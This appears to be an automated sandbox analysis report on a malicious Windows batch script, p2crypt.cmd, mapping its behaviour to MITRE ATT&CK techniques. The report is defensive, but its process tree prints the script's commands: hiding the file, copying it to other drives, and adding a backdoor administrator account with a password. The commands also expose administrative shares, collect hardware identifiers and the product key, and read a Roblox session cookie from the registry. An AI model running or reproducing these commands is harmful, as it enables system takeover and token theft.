e16944299251456c656a9facd6cca02c24cdf1dda39d22c2db96c6463927e125

Analysis

max time kernel
52s
max time network
71s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
30-09-2022 23:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

p2crypt.cmd
Size

7KB
MD5

ad27fa7dbad4e1e519e8fbd87d990a0e
SHA1

ec3bd53f81826b653bb9f39331a78c2eea90003c
SHA256

e16944299251456c656a9facd6cca02c24cdf1dda39d22c2db96c6463927e125
SHA512

8445a24d47968eab988d384f2836c85160265ca254a9fc18d329779f24eac49e36bc3d11e21917e05fae1c95e9374b179e1e9e01b58ba06f78d2c2901f0395a7
SSDEEP

96:vgbIwrzw2Nrup7pgpFpipvpkDtKPmPTGpCTpWpcpXp9pBYH+SNSKS6SYScoxXfbd:XZivgFuZYGZ

Score

9^/10

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
4372	tasklist.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
1096	ipconfig.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4372	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3944	WMIC.exe
Token: SeSecurityPrivilege	3944	WMIC.exe
Token: SeTakeOwnershipPrivilege	3944	WMIC.exe
Token: SeLoadDriverPrivilege	3944	WMIC.exe
Token: SeSystemProfilePrivilege	3944	WMIC.exe
Token: SeSystemtimePrivilege	3944	WMIC.exe
Token: SeProfSingleProcessPrivilege	3944	WMIC.exe
Token: SeIncBasePriorityPrivilege	3944	WMIC.exe
Token: SeCreatePagefilePrivilege	3944	WMIC.exe
Token: SeBackupPrivilege	3944	WMIC.exe
Token: SeRestorePrivilege	3944	WMIC.exe
Token: SeShutdownPrivilege	3944	WMIC.exe
Token: SeDebugPrivilege	3944	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3944	WMIC.exe
Token: SeRemoteShutdownPrivilege	3944	WMIC.exe
Token: SeUndockPrivilege	3944	WMIC.exe
Token: SeManageVolumePrivilege	3944	WMIC.exe
Token: 33	3944	WMIC.exe
Token: 34	3944	WMIC.exe
Token: 35	3944	WMIC.exe
Token: 36	3944	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3944	WMIC.exe
Token: SeSecurityPrivilege	3944	WMIC.exe
Token: SeTakeOwnershipPrivilege	3944	WMIC.exe
Token: SeLoadDriverPrivilege	3944	WMIC.exe
Token: SeSystemProfilePrivilege	3944	WMIC.exe
Token: SeSystemtimePrivilege	3944	WMIC.exe
Token: SeProfSingleProcessPrivilege	3944	WMIC.exe
Token: SeIncBasePriorityPrivilege	3944	WMIC.exe
Token: SeCreatePagefilePrivilege	3944	WMIC.exe
Token: SeBackupPrivilege	3944	WMIC.exe
Token: SeRestorePrivilege	3944	WMIC.exe
Token: SeShutdownPrivilege	3944	WMIC.exe
Token: SeDebugPrivilege	3944	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3944	WMIC.exe
Token: SeRemoteShutdownPrivilege	3944	WMIC.exe
Token: SeUndockPrivilege	3944	WMIC.exe
Token: SeManageVolumePrivilege	3944	WMIC.exe
Token: 33	3944	WMIC.exe
Token: 34	3944	WMIC.exe
Token: 35	3944	WMIC.exe
Token: 36	3944	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4216	WMIC.exe
Token: SeSecurityPrivilege	4216	WMIC.exe
Token: SeTakeOwnershipPrivilege	4216	WMIC.exe
Token: SeLoadDriverPrivilege	4216	WMIC.exe
Token: SeSystemProfilePrivilege	4216	WMIC.exe
Token: SeSystemtimePrivilege	4216	WMIC.exe
Token: SeProfSingleProcessPrivilege	4216	WMIC.exe
Token: SeIncBasePriorityPrivilege	4216	WMIC.exe
Token: SeCreatePagefilePrivilege	4216	WMIC.exe
Token: SeBackupPrivilege	4216	WMIC.exe
Token: SeRestorePrivilege	4216	WMIC.exe
Token: SeShutdownPrivilege	4216	WMIC.exe
Token: SeDebugPrivilege	4216	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4216	WMIC.exe
Token: SeRemoteShutdownPrivilege	4216	WMIC.exe
Token: SeUndockPrivilege	4216	WMIC.exe
Token: SeManageVolumePrivilege	4216	WMIC.exe
Token: 33	4216	WMIC.exe
Token: 34	4216	WMIC.exe
Token: 35	4216	WMIC.exe
Token: 36	4216	WMIC.exe

Suspicious use of WriteProcessMemory 62 IoCs

description	pid	Process	procid_target
PID 2832 wrote to memory of 3388	2832	cmd.exe	67
PID 2832 wrote to memory of 3388	2832	cmd.exe	67
PID 2832 wrote to memory of 4744	2832	cmd.exe	68
PID 2832 wrote to memory of 4744	2832	cmd.exe	68
PID 2832 wrote to memory of 3688	2832	cmd.exe	69
PID 2832 wrote to memory of 3688	2832	cmd.exe	69
PID 2832 wrote to memory of 4772	2832	cmd.exe	70
PID 2832 wrote to memory of 4772	2832	cmd.exe	70
PID 2832 wrote to memory of 4492	2832	cmd.exe	71
PID 2832 wrote to memory of 4492	2832	cmd.exe	71
PID 2832 wrote to memory of 3288	2832	cmd.exe	72
PID 2832 wrote to memory of 3288	2832	cmd.exe	72
PID 2832 wrote to memory of 3716	2832	cmd.exe	73
PID 2832 wrote to memory of 3716	2832	cmd.exe	73
PID 2832 wrote to memory of 2136	2832	cmd.exe	74
PID 2832 wrote to memory of 2136	2832	cmd.exe	74
PID 2832 wrote to memory of 2060	2832	cmd.exe	75
PID 2832 wrote to memory of 2060	2832	cmd.exe	75
PID 2832 wrote to memory of 4404	2832	cmd.exe	76
PID 2832 wrote to memory of 4404	2832	cmd.exe	76
PID 2832 wrote to memory of 4816	2832	cmd.exe	77
PID 2832 wrote to memory of 4816	2832	cmd.exe	77
PID 2832 wrote to memory of 68	2832	cmd.exe	78
PID 2832 wrote to memory of 68	2832	cmd.exe	78
PID 68 wrote to memory of 1012	68	net.exe	79
PID 68 wrote to memory of 1012	68	net.exe	79
PID 2832 wrote to memory of 4848	2832	cmd.exe	80
PID 2832 wrote to memory of 4848	2832	cmd.exe	80
PID 4848 wrote to memory of 5064	4848	net.exe	81
PID 4848 wrote to memory of 5064	4848	net.exe	81
PID 2832 wrote to memory of 3956	2832	cmd.exe	82
PID 2832 wrote to memory of 3956	2832	cmd.exe	82
PID 3956 wrote to memory of 4264	3956	net.exe	83
PID 3956 wrote to memory of 4264	3956	net.exe	83
PID 2832 wrote to memory of 3344	2832	cmd.exe	84
PID 2832 wrote to memory of 3344	2832	cmd.exe	84
PID 3344 wrote to memory of 5108	3344	net.exe	85
PID 3344 wrote to memory of 5108	3344	net.exe	85
PID 2832 wrote to memory of 1436	2832	cmd.exe	86
PID 2832 wrote to memory of 1436	2832	cmd.exe	86
PID 1436 wrote to memory of 2300	1436	net.exe	87
PID 1436 wrote to memory of 2300	1436	net.exe	87
PID 2832 wrote to memory of 2876	2832	cmd.exe	88
PID 2832 wrote to memory of 2876	2832	cmd.exe	88
PID 2876 wrote to memory of 1280	2876	net.exe	89
PID 2876 wrote to memory of 1280	2876	net.exe	89
PID 2832 wrote to memory of 1096	2832	cmd.exe	90
PID 2832 wrote to memory of 1096	2832	cmd.exe	90
PID 2832 wrote to memory of 4372	2832	cmd.exe	91
PID 2832 wrote to memory of 4372	2832	cmd.exe	91
PID 2832 wrote to memory of 3944	2832	cmd.exe	93
PID 2832 wrote to memory of 3944	2832	cmd.exe	93
PID 2832 wrote to memory of 4216	2832	cmd.exe	94
PID 2832 wrote to memory of 4216	2832	cmd.exe	94
PID 2832 wrote to memory of 4252	2832	cmd.exe	95
PID 2832 wrote to memory of 4252	2832	cmd.exe	95
PID 2832 wrote to memory of 3320	2832	cmd.exe	96
PID 2832 wrote to memory of 3320	2832	cmd.exe	96
PID 2832 wrote to memory of 5112	2832	cmd.exe	97
PID 2832 wrote to memory of 5112	2832	cmd.exe	97
PID 2832 wrote to memory of 4092	2832	cmd.exe	98
PID 2832 wrote to memory of 4092	2832	cmd.exe	98

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3388	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\p2crypt.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2832
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Local\Temp\p2crypt.cmd
  2⤵
  - Views/modifies file attributes
  PID:3388
- C:\Windows\system32\xcopy.exe
  xcopy /e /y windows.inf D:\
  2⤵
  PID:4744
- C:\Windows\system32\xcopy.exe
  xcopy /e /y windows.inf E:\
  2⤵
  PID:3688
- C:\Windows\system32\xcopy.exe
  xcopy /e /y windows.inf F:\
  2⤵
  PID:4772
- C:\Windows\system32\xcopy.exe
  xcopy /e /y windows.inf G:\
  2⤵
  PID:4492
- C:\Windows\system32\xcopy.exe
  xcopy /e /y windows.inf H:\
  2⤵
  PID:3288
- C:\Windows\system32\xcopy.exe
  xcopy /e /y C:\Users\Admin\AppData\Local\Temp\p2crypt.cmd D:\
  2⤵
  PID:3716
- C:\Windows\system32\xcopy.exe
  xcopy /e /y C:\Users\Admin\AppData\Local\Temp\p2crypt.cmd E:\
  2⤵
  PID:2136
- C:\Windows\system32\xcopy.exe
  xcopy /e /y C:\Users\Admin\AppData\Local\Temp\p2crypt.cmd F:\
  2⤵
  PID:2060
- C:\Windows\system32\xcopy.exe
  xcopy /e /y C:\Users\Admin\AppData\Local\Temp\p2crypt.cmd G:\
  2⤵
  PID:4404
- C:\Windows\system32\xcopy.exe
  xcopy /e /y C:\Users\Admin\AppData\Local\Temp\p2crypt.cmd H:\
  2⤵
  PID:4816
- C:\Windows\system32\net.exe
  net user admin loveu /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:68
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user admin loveu /add
    3⤵
    PID:1012
- C:\Windows\system32\net.exe
  net user admin loveu
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4848
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user admin loveu
    3⤵
    PID:5064
- C:\Windows\system32\net.exe
  net localgroup administrators admin /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3956
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup administrators admin /add
    3⤵
    PID:4264
- C:\Windows\system32\net.exe
  net share ADMIN$
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3344
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 share ADMIN$
    3⤵
    PID:5108
- C:\Windows\system32\net.exe
  net share C$
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1436
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 share C$
    3⤵
    PID:2300
- C:\Windows\system32\net.exe
  net share IPC$
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 share IPC$
    3⤵
    PID:1280
- C:\Windows\system32\ipconfig.exe
  ipconfig /all
  2⤵
  - Gathers network information
  PID:1096
- C:\Windows\system32\tasklist.exe
  tasklist
  2⤵
  - Enumerates processes with tasklist
  - Suspicious use of AdjustPrivilegeToken
  PID:4372
- C:\Windows\System32\Wbem\WMIC.exe
  wmic nic get macaddress
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3944
- C:\Windows\System32\Wbem\WMIC.exe
  wmic bios get serialnumber
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4216
- C:\Windows\System32\Wbem\WMIC.exe
  wmic computersystem get totalphysicalmemory
  2⤵
  PID:4252
- C:\Windows\System32\Wbem\WMIC.exe
  wmic partition get name,size,type
  2⤵
  PID:3320
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path softwarelicensingservice get OA3xOriginalProductKey
  2⤵
  PID:5112
- C:\Windows\system32\reg.exe
  reg query HKEY_CURRENT_USER\Software\Roblox\RobloxStudioBrowser\roblox.com /v .ROBLOSECURITY
  2⤵
  PID:4092

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Account Manipulation

T1098

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Credential Access

Account Manipulation

T1098

Discovery

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/68-126-0x0000000000000000-mapping.dmp

Download
memory/1012-127-0x0000000000000000-mapping.dmp

Download
memory/1096-138-0x0000000000000000-mapping.dmp

Download
memory/1280-137-0x0000000000000000-mapping.dmp

Download
memory/1436-134-0x0000000000000000-mapping.dmp

Download
memory/2060-123-0x0000000000000000-mapping.dmp

Download
memory/2136-122-0x0000000000000000-mapping.dmp

Download
memory/2300-135-0x0000000000000000-mapping.dmp

Download
memory/2876-136-0x0000000000000000-mapping.dmp

Download
memory/3288-120-0x0000000000000000-mapping.dmp

Download
memory/3320-143-0x0000000000000000-mapping.dmp

Download
memory/3344-132-0x0000000000000000-mapping.dmp

Download
memory/3388-115-0x0000000000000000-mapping.dmp

Download
memory/3688-117-0x0000000000000000-mapping.dmp

Download
memory/3716-121-0x0000000000000000-mapping.dmp

Download
memory/3944-140-0x0000000000000000-mapping.dmp

Download
memory/3956-130-0x0000000000000000-mapping.dmp

Download
memory/4092-145-0x0000000000000000-mapping.dmp

Download
memory/4216-141-0x0000000000000000-mapping.dmp

Download
memory/4252-142-0x0000000000000000-mapping.dmp

Download
memory/4264-131-0x0000000000000000-mapping.dmp

Download
memory/4372-139-0x0000000000000000-mapping.dmp

Download
memory/4404-124-0x0000000000000000-mapping.dmp

Download
memory/4492-119-0x0000000000000000-mapping.dmp

Download
memory/4744-116-0x0000000000000000-mapping.dmp

Download
memory/4772-118-0x0000000000000000-mapping.dmp

Download
memory/4816-125-0x0000000000000000-mapping.dmp

Download
memory/4848-128-0x0000000000000000-mapping.dmp

Download
memory/5064-129-0x0000000000000000-mapping.dmp

Download
memory/5108-133-0x0000000000000000-mapping.dmp

Download
memory/5112-144-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads